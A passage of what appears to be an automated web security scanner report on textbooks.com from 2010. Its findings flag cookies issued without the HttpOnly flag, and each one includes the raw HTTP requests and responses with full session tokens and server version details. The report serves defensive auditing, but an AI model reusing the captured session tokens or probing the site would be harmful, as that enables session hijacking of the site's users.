Date: Sun, 26 Dec 2010 13:51:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=IUNU%2FCVo3e7OAi3monE7uCKuNyCjn5xqOcaCW%2FojlApqnsXvSUcUMOZl%2Fl8xqqJr9Y3Dw8PP2JICBiWM7Ak%2BHP9rNIzm%2FMoylv%2FVwIAvI140oSpVSBxpIYvn92zyqpwSPPrcGtTaexBsW5Chmrif7zJaJoACHS2EIIySIqSt2I0NV8n6nnhIPVo8RX%2FrUG2RBrQHWwa0R19c009fjgbYxmyPo%2B5NOetV8THje7FeH13zQI39TXIB9TIyBHQ1EB%2BXWVXQac0Ey45mygp%2Bt7iYST4atUOq%2Fl3U44mEfbjIRjKtyI1D%2BiXOv9w5IZLdyvQZjOnzlUvwem93ygYrsFZW5%2FjvekOHJEznxLWsbtI4zRDPLJZ66QRiax%2FUhM9TxI7Xf0lZ5L%2F10lsV7GmSA4J25Z1gGeA928TgjRf2T63g80GqRaftVJIA%2FHBd9QzmkHN%2FKa%2ByoG4hkOrtT2hOEaKk6Ke6Rj27ja%2BdHdb0GNwnZPZE1m5xvH5SZVFXHwBzTMv1BREEsKcH%2B0mWwEZ3faoX8ra5YYektLjd%2BnRRsiopnGuR2xNXAACIXxWM672Qarg82sA1Fesrsho3iH22CDsDaKzDZ3B0oF%2FJ%2FaiFWbkfgelNPYjkfOQ4sqgctsGj7%2FK1lub%2FdkTrgB5oX%2FemQDN53IOQAxOhT7OGDhDp%2Bt%2B1CL0ohB%2B4hN9Vye%2FHFzmjXj6v5r3L9GF24tjgLNgDc%2FthzEZHZrxBdWtHozBVeAaZHgKq2WQ8Et5pELcH8OR%2BaqH%2F6BEMH1NIsd9T9%2Bau52CbsvVuOVsXJuhbBFT4okHAFCKjUFtlFrqfP9ykwm0uU71U2eajIphvFjf5X%2F9qtHeimMNXB8MhOYfOJRTJ01R%2FuSqw%2B245%2BAYRvEGBePAT%2BNnXSLXzIhg1cMqYrmQED%2BFpNjdu7eIgMaByUCXYhYHTrpoKhnPZAV5%2FuevXai0LvCMC1QjNWN4e8EA788UJBDoacNBhtUTF1%2BFMUrf6hvzZ51cjKf%2FUrQ3U7TgH9hux7bP3D6ZdSNv3FJKyprgWHoHR4x82%2BiDXUckV42NLHqWtt9ki4EFpJN2PGZxxEVeMkakM9da9HHZDo%2BU4Lg5J%2FaZJ2aEDRyg8o4R9rmdnDC4WtwQ54hev%2FWEMylzZNyqIOqPjsyY2LrB3Akg0Xd3maRkS8%2Fs9Au3VfJ8SJnOLJoZVzmIaaL%2Bv2Pj5pIIhWLkUmR04UQ%2Fza3XsvHyiP0ryCWvhE4SwyTOBBkCL6PvopHc4qfH0cCTmYwqL7opoI6Q%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=O7IQMANG3VCTdpnhVXo%3D; expires=Mon, 26-Dec-2011 13:51:59 GMT; path=/; domain=.textbooks.com
Content-Length: 35362


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.2. http://www.textbooks.com/Author/Peter_Vorderer.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Author/Peter_Vorderer.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Author/Peter_Vorderer.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:53:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=H01U36MSp2dZuiYXGjisaivMdUBgZaLhl4%2FnJGGLIw0eZsY%2BGwK8RLrTb0Mn7MlBojEDK1pCuEjD%2F4SI1V9tIZrtItqjVkwmuFxeNkXpLLphXwnqkLiewlO0zWNUBkZlheVezHXMZgLZQPEWG3uJFdFa3R4AaBmosszdTLbwSBeRufTyT7DmLHTmY5h6yDHjYtt9JPgoWW%2FdSnKXM5u6A%2Fmt5dpfuTcdZfhJZA4rRlDnz9vC64xjS%2FPUCLqvzcw2TSUoiwIX1WvWuTj6hZY3d8TPab0WekS2SMiB7c9KOZyuMA9rj9ruOpqDfOtb7FiwqPIuR7izBEvzhlkQibRlyYgD4xTcLczw5s4y6SdQa%2F5Y%2FMSdfq9y%2BlT8EdOSPVEFadz%2FZkz845z0jGCXfRvlQb9ey0nqEPZerPKAXaIQLq1eNTMm5k9fzdLUX4Z9AAbLP9rYik51SDvDcnT7QO6VgSwypJVzXF42pZsH16snj3Ir4DnTmfHkJ9XdOLa%2BASkH6jqLSjeR0uxlVn46oNiDql7qqsU1TlHw2uNhppz8tb7oP1k%2FyH0W5bm1%2FDYOPHSIfMc4XUcb3f4K6i5t6FKQ2Tv0jiPt76gJBjd3WvIPTrcFpbBVTcVSu7Qd4G5uq%2FQMzl7heE3aBbybUdd68hi3MwSdKlg2g%2BQBIp%2FEV%2B0hZNa3akd7Lcag7Rp9Yy%2FHSkg2efBneciWE5914OiJ5sXY874FeMSVGnZrMoVvoztI3T5RlxjY9lZ5c4aQ3Q4W5D6t3uW911wm10TGCKjQxdujRHUFOSNFmQoj0CGYVcObVqLQFJ4S7vQrbI%2Ffdloa5%2B1NpgMYC5ixSIG4e6N7BqyT97eESy8SEA3j%2FJd%2F4OX1BXmHG58Q74HA8NTsKLrIgiolu871V9eSwRT7J6fGx54s%2BtKQP1r5ma0z1xFYcGyzaztJaPwBXtDCWrXqjZ9AexjzaIE5GLWoo7bf0yAIlFjWiVLnX2FPyxKOcxJE3hP%2B%2FVe76wnw2DHFPjNKbzLGUdJwBRdhV4jSaYdtscek5Ei4058GEgjJieD4NTiFL97OuABKvt0pBc0cRTBH6rbzLmVnr46QCPHLgLxBFOBXgDUUxDKYGlBnppd5bSMp3a0wgyYHuRd%2BPl1PWlRO8761qzLi5maBr%2BIM9eh2%2B4cfNshfqxPP5bO2NXqaEkF179xjjC5LpJZIrrlhBNkEcmab4qfvz6XhhMkl6PO3flcm9JSwxSBzGJNKcf1Wkyh2U7HuJbBJtYzN9xU6Tv%2BT4Pc%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=C0ot1rm4AVmqgN2OAk8%3D; expires=Mon, 26-Dec-2011 13:53:04 GMT; path=/; domain=.textbooks.com
Content-Length: 48376


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- START OF PAGE 12/26/20
...[SNIP]...

4.3. http://www.textbooks.com/BooksDescription.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /BooksDescription.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BooksDescription.php?BKN=756724&SBC=CB0&mcid=XCS-Become-9780805853223-U&utm_medium=shoppingengine&utm_term=9780805853223U&utm_source=become HTTP/1.1
Host: www.textbooks.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:44:21 GMT
Connection: close
Set-Cookie: BNG=deleted; expires=Sat, 26-Dec-2009 13:44:19 GMT; path=/
Set-Cookie: 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; expires=Tue, 25-Jan-2011 13:44:20 GMT; path=/
Set-Cookie: TBSESSION=JrxP960N4HQ7mADzP1D7yqF0fNX%2BR0clTNCcjEKeryEMxNgKFUiFfkJvGOkcESM4s6u2M9wn4Mp0eRxMk2zoO7gpAukCPAS47mKQ7RdsfA6qfnrndZzf40lVm5GwdoII1X%2FOU6gdYzFRpWRB72Nh2BnyY77V7GlCiIC740scKoPvcPhyClreKV%2FjFSfPbdPqRfrQIBVLVKbto66IzMi6Mu3h%2FcDrsNX5UudWvpdhNY5%2Bncv%2F3CGwzVpwrbWcvpYK%2FKEubIHcYREUgPGOaTiojy%2FzUQ5bVgATj5FVT%2FTggUeshMviDyO8%2FDi2u4i4WZXO37DRyxznP7W1AxSZMCbtdz%2F6leTHX25wztUnoW5v6PxdgaKOgvHoy8zT26FS1ub4D9yxxpu4RrCJCxpEtfckl4TaucHvWO8QetcLcTp58oqeH0kUQ0aftAWwWK9zgJ1%2FwxNppv63COoFEfLhXopwvkWAyPmrJnDadLs91HLXpfaEvPBxOeAMXAmaP6wvZd0Rutsh7ubiGuFDbfsQcnRXckp3Zv4dBZsXrQq%2FAR6oX9jY762kpGuBc%2Fzig8kEdzmoIr6ppRreuRZflmL8KLLYOI%2B5s7dZ915IMDlggsZX4x1AD90Te%2BdaYyA73n%2Fm%2F1JGY283ScqT1f3fb80S8M6QEhgTEGa5LuNLs7S9ZSIQUGje4CYjCBJhxFI7uvkERtdhpoAxBfflkxVFj9xgQu0k2Z0zP24cM42vrPcRirLWAGvu0XPtgwx1YrQTrCBy9vdjdAHgSKzeBSMj2iVkd9aZuxoe8HUCfENbBPaaVFrlSBRCSPoz2X%2FedX%2B%2Fr%2FDmYkSD0D%2B1XybKRtasGTxPpNKp8Up%2Ft1naz8ZzaU5qKJ0OCkv3CKnmKtpTnhVOXiwg8%2FbFpVCNtkIj80WoNu9DEH6xLC4nve%2BcnKGkJVjfBm59WWI%2FxiLbKLojbK5rMoOt1IxpUoEDCajy5tR3u10meUmFUBje4VEWr7MMYmM7DucLesIzbcluQJdVpbBmZLYD2GLQ%2F7LWzgGhPCkj1pFYFtCm7oP3g45E9TZvFomoyJsHA0AVB%2BOF%2FjFPfEDh%2B50F%2BAUTj%2FWcIMn2vB%2BYT5MGse7JqPTvh7rgkKPsDWozH63rLzr6RTK4i%2Fh85gX4%2Ft3RAFxG8LtSmX44znQBBzNc32eNyKjqwj8ZaOpV9gXkK2%2BJhJ6SP3cMOJc%2B96CRisy7mmFSE5odQO5DJNaS5iIs3Brs3B5hjFpsZI7dZg9F%2BJ9w%2FT3qfQlIkUWHsMGOmz0lAbK%2BMyzWAOj9tznYP8QeuQPB6Q%3D%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=mwIrsiZ%2BRpZU9lHz%2BTc%3D; expires=Mon, 26-Dec-2011 13:44:20 GMT; path=/; domain=.textbooks.com
Set-Cookie: TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; expires=Mon, 26-Dec-2011 13:44:21 GMT; path=/; domain=.textbooks.com
Content-Length: 55234


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
   <meta name="keyw
...[SNIP]...

4.4. http://www.textbooks.com/BuyBack-Search.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /BuyBack-Search.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BuyBack-Search.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:53:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BBVC=deleted; expires=Sat, 26-Dec-2009 13:53:01 GMT
Set-Cookie: BBVC=deleted; expires=Sat, 26-Dec-2009 13:53:01 GMT
Set-Cookie: TBSESSION=tDL1W8D7gaCS7jzI6Dzjj4VxTEZdKx54wiBKsRJp2y62pibSI8t34OV5LbMNc5J%2BIDh%2F7cXjxIkPCea1HFWQwg4kkvAf5y%2FWIMqnMEOYq5gwfo0nT%2Br3%2B0Mr2U51pNHYBL7L00QV1Pks3Wo83iqXa%2B7yPEmc%2B%2Flgv%2FadwiXTLDJFUr0vnlwokBSjUmrzJgmZryaXHiFLddpXygKYaW023Yg9OSvJi7Hu%2FMNV1OmaPldRr8NvAwN2D0XT49iDMa%2Bf2xtP6Spo7VHCWA6XYz7ITxlt3GaGxxIIo5tXwc5OpTrHqXKdZAdne2jrWU0C9uquUNG68ReG4eYsffCNTtp0n5TG45l11y3WH%2BJEt7bU0WSXGGXcsMXGGjMQO%2BiGd9q7M5Qz3rCO1ddl2dPVIFEGnDI46PKJPARVjZ7nWLgO03rHvHQgwDOpESSmNx6s2uOMe2EUAO%2BEOFsW5KXx7reamIunceN4S%2BcnJTYQ0FH2ipMMSxfFpIidrjTV8mmp0bf7jLgecSzagN1fHJx5fRhv%2BmeNxmxBvAKYx1W3Lrr2iwld3q2%2Fci%2FPFnpICPJNUU22bWGkl8z%2FohGLs8oosTpgzAmuYGE3dpvbdIDYNBpsBJYY8%2Bl%2Bfi0gbtnbrbxa1vAkZh04aZMtNdXM8EfztGRlpwB%2B5UN1%2BleUU7v%2FnRvQHz9N48UQiOFcB5WQ3y9rxlRU8erTcckrQ2ok7D4S4tulcBOAuNzSkUak48NLzAEQubR%2BSlReGPs0OFk3ga0Ak8Ie75nTGmuPNwq7iuUuzO1hlxPJkrpdQ%2Be9cdGQRwnrskQvh2JvhGmyj3xPJ7IMFxhV%2Ftdv%2BKn62YFQ50%2FVDLanFjHYkhhICDrnx1gf0b%2F14Sh0tZPSmceYUkEjlZreJ3mdp80vc8jooDDhCSXpeJO0OUyhzaXX%2FrptrGcvsef07pvCuUku%2FuJZxotQmum0fs7Lpsg3%2FTiPv0lEeieSUA%2FFMlJxy%2BiCrl4cD23thJbSkwqHTKthbb9oXiViEvHpLerRSsI4XSIuUWaE2IUurstFcJkUY7ng4MGWzRUSDioyeDe3MFN0qlXJxlPhOgjHsM%2BeLri8m%2BBvkXPnMsnozg7j6h1J0BVLRtD7kvlRtQpJ76xS1r0GGMb4cmhZcd%2BrrvLN8CK%2FXqu6P6aQt6T9m7DlM68gUlh%2FR1uSHpCMBltVrtitvz4kN95S8TT9BFfJEEnu%2FnImW0wLUwiQRhHxs20WtHAuk4vQoQYH4MjtdFs3sQVmMcQ3T8UDSK2r2JU%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=0COxkJ9ZgoIrUuXJTYo%3D; expires=Mon, 26-Dec-2011 13:53:02 GMT; path=/; domain=.textbooks.com
Content-Length: 35930


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.5. http://www.textbooks.com/Cart.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Cart.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Cart.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:51:57 GMT
Content-Length: 25374
Connection: close
Set-Cookie: TBSESSION=1pesYoGAQove8asXg%2FLQi3Odk%2FALvaMYWu4u5JdrXTswRUYUKJvQ7xvzZDAfEgGZUlgQdk0f2GecdTZ4qhGUXZ0yT3xlVp3q%2BMehNWH1ykufc%2BUXdB3NVfdJrrjBDK8gumhqKLWu0AnbdX5fvbqtoQjunBi75eZszh1B7jF6RpGjFzW%2FNuQqdz2nzK0VFeUkFOtMW95SAVCwyyverIx0vCc9sE%2BC6dFtzuJ2AH624CJYm8cPTMeM0L%2B6WDvSzbNQJIYrc0pCKK6mSWoArebTZiGaIOpXIf3AtesREiYJRduH1CUhC3mMZWjnPPGKgLkRJdbQLTZw1sZ7XT2aZCMkGa3ru5%2FagVViWzzbpVRxz%2FgKx7QSWWbAGBRHVhNtmnVpxVB3gwMjKydAeKz2mzXmakCZnc4XzhAnvipACD6WTEgoNZ%2FbV5n%2BWrkaPUnY02ky7ylalmqoOcyNbCApYgIvT1h5ATGTLViVs3A4Nxsv7T%2FLMELKk0XheRpXRtLixaAlRyVESWhMQqVk3NALmjFRs90VKA2rh3UFDYhO4e1NrU2%2Bi1mPTJeGYCrWhn2n8MlWUJgr62VVmrWzAWjobClto930h9w7p2W2gdHmydwE92U